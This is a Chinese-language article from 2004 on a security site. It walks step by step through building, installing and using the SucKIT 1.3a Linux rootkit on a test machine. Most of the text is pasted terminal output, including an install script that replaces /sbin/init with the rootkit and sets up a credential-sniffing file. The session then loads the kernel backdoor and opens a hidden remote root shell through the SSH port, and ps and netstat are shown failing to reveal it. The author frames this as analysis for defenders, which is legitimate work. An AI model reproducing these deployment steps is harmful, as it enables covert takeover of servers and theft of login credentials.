黑基网 首页 学院 编程开发 查看内容

SuckIt-1.3a 后门程序的分析

2004-12-8 04:19| 投稿: soft

摘要: 作者:learning     从http://www.ossec.net/rootkits/ 偷来了不少RootKit程序,其中有个sk-1.3a这个软件吸引了我。这个程序曾经安装过前段时间Deb...
作者:learning     从http://www.ossec.net/rootkits/ 偷来了不少RootKit程序,其中有个sk-1.3a这个软件吸引了我。这个程序曾经安装过前段时间Debian服务器被黑的事件,当初就是这个程序导致了Debian服务器接连被黑掉的恶性结果。具体如何入侵到Debian服务器这个不说,我先分析分析这个程序是如何工作的。拿到这个程序的名字为sk-1.3a.tar.gz,tar -xvzf sk-1.3a.tar.gz到我的Redhat7.2中。[[email protected] backdoor]# tar -xvzf sk-1.3a.tar.gzsk-1.3a/sk-1.3a/include/sk-1.3a/include/types.hsk-1.3a/include/sk.hsk-1.3a/include/defs.hsk-1.3a/include/extern.hsk-1.3a/include/skarg.hsk-1.3a/include/strasm.hsk-1.3a/include/stuff.hsk-1.3a/include/idt.hsk-1.3a/include/skstr.hsk-1.3a/include/rdata.hsk-1.3a/include/sha1.hsk-1.3a/include/lib.hsk-1.3a/include/crypto.hsk-1.3a/src/sk-1.3a/src/main.csk-1.3a/src/kmem.csk-1.3a/src/pattern.csk-1.3a/src/kernel.csk-1.3a/src/printf.csk-1.3a/src/client.csk-1.3a/src/install.csk-1.3a/src/Makefilesk-1.3a/src/sha1.csk-1.3a/src/zbin2oct.csk-1.3a/src/lib.csk-1.3a/src/crypto.csk-1.3a/src/backdoor.csk-1.3a/src/zlogin.csk-1.3a/src/zpass.csk-1.3a/Makefilesk-1.3a/configsk-1.3a/doc/sk-1.3a/doc/READMEsk-1.3a/doc/licensesk-1.3a/doc/CHANGESsk-1.3a/doc/TODO[[email protected] backdoor]# cd sk-1.3a[[email protected] sk-1.3a]# lsconfig doc include Makefile src[[email protected] sk-1.3a]#makePlease do `make skconfig` in top level directory to generate configuration file.make: *** [include/config.h] Error 1 (告诉我们不要用make,而是用make skconfig)[[email protected] sk-1.3a]#make skconfigrm -f include/config.h sk login instmake[1]: Entering directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o passmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====][====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]Please enter new rootkit password: (让我们输入密码)Again, just to be sure: (再次输入确认密码)OK, new password set.Home directory [/usr/share/locale/sk/.sk12]: (通过后门进入的缺省目录)Magic file-hiding suffix [sk12]: (sk12后门程序,使用ls -l可以察看到有个.sniffer文件,这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生) Configuration saved. (保存配置文件)From now, _only_ this configuration will be used by generatedbinaries till you do skconfig again.To (re)build all of stuff type 'make' (开始执行make命令)[[email protected] sk-1.3a]# makemake[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o loginrm -f sk kernel.omake skmake[2]: Entering directory `/root/backdoor/sk-1.3a/src'make[3]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.cgcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.sgcc -c kernel.sgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.cgcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.cmake[3]: Leaving directory `/root/backdoor/sk-1.3a/src'gcc -s -nostdlib *.o -o skmake[2]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'make[1]: Entering directory `/root/backdoor/sk-1.3a/src'gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2octmake[1]: Leaving directory `/root/backdoor/sk-1.3a/src'cp -f src/login logincp -f src/sk skCreating install scriptecho "#!/bin/bash" > instecho "D=`cat include/config.h | grep HOME | awk {'print $3'}`" >> instecho "H=`cat include/config.h | grep HIDESTR | awk {'print $3'}`" >> instecho "mkdir -p \$D; cd \$D" >> instecho "echo > .sniffer; chmod 0622 .sniffer" >> instecho "echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk" >> instecho "chmod 0755 sk; if [ ! -f /sbin/init\${H} ]; " \"then cp -f /sbin/init /sbin/init\${H}; fi;" \"rm -f /sbin/init; cp sk /sbin/init" >> instOkay, file 'inst' is complete, self-installing script. (将inst文件属性为可执行)Just upload it somewhere, execute and you could log in using./login binary.Have fun![[email protected] sk-1.3a]#chmod +x inst (将inst文件属性为可执行)[[email protected] sk-1.3a]# ./instYour home is /usr/share/locale/sk/.sk12, go there and type ./sk to installus into memory. Have fun![[email protected] sk-1.3a]#./sk (执行sk后门程序)[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====][====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]RK_Init: idt=0xc028f000, sct[]=0xc023e13c, kmalloc()=0xc012c180, gfp=0xf0Z_Init: Allocating kernel-code memory...Done, 12902 bytes, base=0xc3dd8000BD_Init: Starting backdoor daemon...Done, pid=1354 (后门加载成功)[[email protected] sk-1.3a]#下面该如何去做呢?我该如何做到可以远程登陆呢?究竟执行完这些程序,系统做了些什么呢?为何我ps ax 、netstat -alp看不到任何可疑的现象呢?呵呵,要是能看到的话,也就不是RootKit了。不要着急,一切都将在下面的操作中一目了然。Sk高明就高明在可以通过目前正在使用的端口悄无声息的进入到系统中。譬如系统开了DNS-53、FTP-21、SSH-22、http-80端口,那么程序可以绑定在这些端口,以正常访问的模式进入到系统中。在netstat -alp看不到其余打开的服务端口。OK,下面操作可以将程序的运作方式暴露无遗[[email protected] sk-1.3a]# lsconfig doc include inst login Makefile sk src看到login了吧,这不是linux系统本身的login程序,而是后门进入的一把钥匙。[[email protected] sk-1.3a]# ./login[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====][====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]use:./login [hsditc] ...args-h Specifies ip/hostname of host where is runningsuckitd (远程登陆到正在运行着的Suckit后门程序的服务器)-s Specifies port where we should listen for incomingserver' connection (if some firewalled etc), if notspecified, we'll get some from os (指定运行着的Suckit后门程序的服务器的port,如果不指定,系统将进行扫描,找到正在运行着的端口进入)-d Specifies port of service we could use for authenticationecho, telnet, ssh, httpd... is probably good choice -i Interval between request sends (in seconds)-t Time we will wait for server before giving up (in seconds)-c Connect timeout (in seconds)[[email protected] sk-1.3a]#注意,login不是在已经安装了后门的服务器运行着的,而是用其它的服务器来运行login远程登陆这台被安装了后门得服务器,okey,我去找找另外一台服务器,上传了这个login后,我要开始偷偷进入喽!注意:这是另外一台client服务器,用来远程登陆的login到安装后门的动作[[email protected]_server tmp]# ./login -h 192.168.1.2[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====][====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======]Listening to port 34245password: (输入你刚才安装Suckit程序的密码)Trying 192.168.1.2:53...connect: Connection refused 不能登陆Trying 192.168.1.2:79...connect: Connection refused 不能登陆Trying 192.168.1.2:110...connect: Connection refused 不能登陆Trying 192.168.1.2:220...connect: Connection refused 不能登陆Trying 192.168.1.2:21...connect: Connection refused 不能登陆Trying 192.168.1.2:22... 开了ssh服务,我要进去啦Trying...Et voilaServer connected. Escape character is '^K'[===== SucKIT version 1.3a, Jul 26 2004 <http://sd.g-art.nl/sk> =====][====== ©oded by sd <[email protected]> & devik <[email protected]>, 2002 ======][[email protected] .sk12]# 我终于进来啦![[email protected] .sk12]# ifconfigeth0 Link encap:Ethernet HWaddr 00:02:6B:00:2E:31 inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:7612 errors:0 dropped:0 overruns:0 frame:0TX packets:2634 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:100 RX bytes:777061 (758.8 Kb) TX bytes:360531 (352.0 Kb)Interrupt:12 Base address:0x7000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0UP LOOPBACK RUNNING MTU:16436 Metric:1RX packets:272 errors:0 dropped:0 overruns:0 frame:0TX packets:272 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0 RX bytes:19008 (18.5 Kb) TX bytes:19008 (18.5 Kb)[[email protected] .sk12]# pwd/usr/share/locale/sk/.sk12[[email protected] .sk12]# (没错,我进来的时候缺省的就是这个目录)[[email protected] .sk12]# iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)(我是上帝了)[[email protected] .sk12]# whoroot tty1 Jul 26 08:48 (这个是本地登陆的信息,没有远程登陆的账户名称信息,看来确实隐藏成功了)[[email protected] root]# ps ax PID TTY STAT TIME COMMAND1 ? S 0:06 init [3] 2 ? SW 0:00 [keventd]3 ? SW 0:00 [kapm-idled]4 ? SWN 0:00 [ksoftirqd_CPU0]5 ? SW 0:00 [kswapd]6 ? SW 0:00 [kreclaimd]7 ? SW 0:00 [bdflush]8 ? SW 0:00 [kupdated]9 ? SW< 0:00 [mdrecoveryd]20 ? SW 0:00 [kjournald]98 ? SW 0:00 [khubd]190 ? SW 0:00 [kjournald]610 ? S 0:00 syslogd -m 0615 ? S 0:00 klogd -2635 ? S 0:00 portmap653 ? S 0:00 /usr/sbin/sshd679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data782 ? S 0:00 crond790 tty2 S 0:00 /sbin/mingetty tty2791 tty3 S 0:00 /sbin/mingetty tty3792 tty4 S 0:00 /sbin/mingetty tty4793 tty5 S 0:00 /sbin/mingetty tty5794 tty6 S 0:00 /sbin/mingetty tty61108 tty1 S 0:00 login -- root 1386 tty1 S 0:00 -bash1439 ? S 0:00 /usr/sbin/sshd1440 pts/0 S 0:00 -bash1483 pts/0 R 0:00 ps ax[[email protected] root]# (这是我安装了Suckit后门服务器的ps状态,呵呵,没有什么可疑的程序出现了吧)[[email protected] root]# netstat -alptcp 0 0 *:sunrpc *:* LISTEN 635/portmap tcp 0 0 *:http *:* LISTEN 679/httpd tcp 0 0 *:ssh *:* LISTEN 653/sshd tcp 0 0 *:https *:* LISTEN 679/httpd tcp 0 20 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd udp 0 0 *:sunrpc *:* 635/portmap Active UNIX domain sockets (servers and established)Proto RefCnt Flags Type State I-Node PID/Program name Pathunix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432unix 5 [ ] DGRAM 1142 610/syslogd /dev/logunix 2 [ ] DGRAM 22557 1108/login -- root unix 2 [ ] DGRAM 2207 782/crond unix 2 [ ] DGRAM 1151 615/klogd unix 2 [ ] STREAM CONNECTED 885 1/init [3] 呵呵我也看不到有任何可疑的端口在连接活动啊?奇怪奇怪。那我从远程login进入的服务器后的状态看看吧。哈哈,一目了然拉!!!![[email protected] .sk12]# ps axPID TTY STAT TIME COMMAND1 ? S 0:06 init [3] 2 ? SW 0:00 [keventd]3 ? SW 0:00 [kapm-idled]4 ? SWN 0:00 [ksoftirqd_CPU0]5 ? SW 0:00 [kswapd]6 ? SW 0:00 [kreclaimd]7 ? SW 0:00 [bdflush]8 ? SW 0:00 [kupdated]9 ? SW< 0:00 [mdrecoveryd]20 ? SW 0:00 [kjournald]98 ? SW 0:00 [khubd]190 ? SW 0:00 [kjournald]610 ? S 0:00 syslogd -m 0615 ? S 0:00 klogd -2635 ? S 0:00 portmap653 ? S 0:00 /usr/sbin/sshd679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data782 ? S 0:00 crond790 tty2 S 0:00 /sbin/mingetty tty2791 tty3 S 0:00 /sbin/mingetty tty3792 tty4 S 0:00 /sbin/mingetty tty4793 tty5 S 0:00 /sbin/mingetty tty5794 tty6 S 0:00 /sbin/mingetty tty61108 tty1 S 0:00 login -- root 1354 ? S 0:00 ./sk (哈哈,sk进程出来了吧)1376 ttyp0 S 0:00 sh -i1386 tty1 S 0:00 -bash1439 ? S 0:00 /usr/sbin/sshd1440 pts/0 S 0:00 -bash1492 ttyp0 R 0:00 ps ax[[email protected] .sk12]# netstat -alp Active Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 *:sunrpc *:* LISTEN 635/portmap tcp 0 0 *:http *:* LISTEN 679/httpd tcp 0 0 *:ssh *:* LISTEN 653/sshd tcp 0 0 *:https *:* LISTEN 679/httpd tcp 0 0 Learning:1076 192.168.1.66:34245 ESTABLISHED 1374/sk tcp 0 0 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd udp 0 0 *:sunrpc *:* 635/portmap raw 0 0 *:tcp *:* 7 1354/sk Active UNIX domain sockets (servers and established)Proto RefCnt Flags Type State I-Node PID/Program name Pathunix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432unix 5 [ ] DGRAM 1142 610/syslogd /dev/logunix 2 [ ] DGRAM 22557 1108/login -- root unix 2 [ ] DGRAM 2207 782/crond unix 2 [ ] DGRAM 1151 615/klogd unix 2 [ ] STREAM CONNECTED 885 1/init [3] 红色的看到了吧。哈哈,而且设置成了raw模式,找到了。不过不从远程登陆这台已经安装了后门程序的方式进来,那么很难去发现系统到底该如何发现后门了。从以上大家可以看到,Suckit真的不愧为有这个称号,它可以吸附到目前服务器打开的端口,从中远程偷偷登陆进来,进来后也是隐身的方式。Ps、netstat等等程序根本无法跟踪到该服务程序是否在运行。这就是Suckit,看来卸载该程序也比较困难喽,呵呵,经过研究发现,其实不是很难,只需要细心就足够了。稍后整理后,将如何卸载Suckit的方式呈现给朋友们学识粗浅,上述有些地方说得让高手们见笑了,如有任何错误请高手们请教
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部